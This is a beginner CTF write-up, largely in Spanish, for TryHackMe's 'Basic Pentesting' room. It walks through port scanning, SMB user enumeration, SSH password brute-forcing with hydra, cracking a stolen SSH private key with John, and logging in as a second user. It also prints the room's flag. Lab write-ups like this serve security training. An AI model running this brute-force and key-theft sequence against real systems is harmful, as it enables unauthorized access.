Basic Pentesting - TryHackMe
“Basic Pentesting” is a beginner level pentesting room in TryHackMe which covers very basic pentesting techniques.
Summary
- IP: 10.10.116.216
- Ports: 22,80,139,445,8009,8080
- OS: Linux (Ubuntu)
- Services & Applications:
- 22 -> OpenSSH 7.2p2 Ubuntu 4ubuntu2.4
- 80 -> Apache httpd 2.4.18
- 139 -> netbios-ssn Samba smbd 3.X - 4.X
- 445 -> netbios-ssn Samba smbd 4.3.11-Ubuntu
- 8009 -> Apache Jserv (Protocol v1.3)
- 8080 -> Apache Tomcat 9.0.7
Recon
- Reconocimiento básico de puertos:
$sudo nmap -p- -sS --open --min-rate 5000 -vvv -n -Pn 10.10.116.216 -oG allPorts
- Reconocimiento profundo de puertos encontrados:
$sudo nmap -p22,80,139,445,8009,8080 -sCV 10.10.116.216 -oN targeted
- Análisis de directorios con gobuster:
$gobuster dir -u http://10.10.116.216:80 -w /home/dante/SecLists/Discovery/Web-Content/common.txt
- Encontramos el directorio /development, el cual contiene dos ficheros:
dev.txt
j.txt
- Realizamos un escaneo de log del protocolo smb:
$enum4linux.pl -a 10.10.116.216 | tee enum4linux.log - Encontramos los siguientes usuarios:
\kay
\jan
- Con los usuarios encontrados, aplicamos fuerza bruta con hydra para intentar encontrar la contraseña para entrar vía ssh:
$hydra -l jan -P /home/dante/SecLists/Passwords/Leaked-Databases/rockyou.txt ssh://10.10.116.216 - Accedemos como usuario jan:
$ssh jan@10.10.116.216 - Buscamos información que nos sirva para escalar privilegios o pivotear usuarios; encontramos un archivo ./kay/.ssh/id_rsa el cual contiene la private key ssh del usuario kay, la desciframos con John:
- Primero copiamos el contenido exacto del archivo id_rsa y lo guardamos en un archivo pass
- Ejecutamos
$python3 ssh2john.py pass > pass.txt - Luego crackeamos con John:
$john -w:/home/dante/SecLists/Passwords/Leaked-Databases/rockyou.txt pass.txt
- Con la contraseña obtenida, accedemos via SSH con la private key anteriormente almacenada como pass:
$ssh -i passs kay@10.10.116.216 - Encontramos la flag de usuario: heresareallystrongpasswordthatfollowsthepasswordpolicy$$